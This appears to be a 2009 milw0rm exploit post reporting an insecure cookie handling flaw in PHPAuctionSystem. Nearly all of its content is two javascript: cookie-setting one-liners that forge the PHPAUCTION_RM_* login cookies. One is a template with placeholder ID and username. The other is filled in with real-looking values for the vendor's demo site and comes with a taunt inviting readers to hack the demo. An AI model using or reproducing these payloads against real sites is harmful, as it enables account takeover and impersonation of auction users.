29 lines
No EOL
1.3 KiB
Text
29 lines
No EOL
1.3 KiB
Text
[~] PHPAuctionSystem Insecure Cookie Handling Vuln.
|
|
[~]
|
|
[~]----------------------------------------------------------
|
|
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
|
|
[~]
|
|
[~] Date: 05.01.09
|
|
[~]
|
|
[~] Home: z0rlu.blogspot.com / www.experl.com
|
|
[~]
|
|
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
|
|
[~]
|
|
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
|
|
[~] -----------------------------------------------------------
|
|
|
|
javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; "PHPAUCTION_RM_EMAIL=[email]; path=/";
|
|
|
|
exp for demo: ( username: sallama )
|
|
|
|
javascript:document.cookie = "PHPAUCTION_RM_ID=47; path=/"; document.cookie = "PHPAUCTION_RM_NAME=salla; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=sallama; path=/"; "PHPAUCTION_RM_EMAIL=trt-turk%40hotmail.com; path=/";
|
|
|
|
|
|
[~]----------------------------------------------------------------------
|
|
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
|
|
[~]
|
|
[~] yildirimordulari.org & experl.com
|
|
[~]
|
|
[~]----------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2009-01-05] |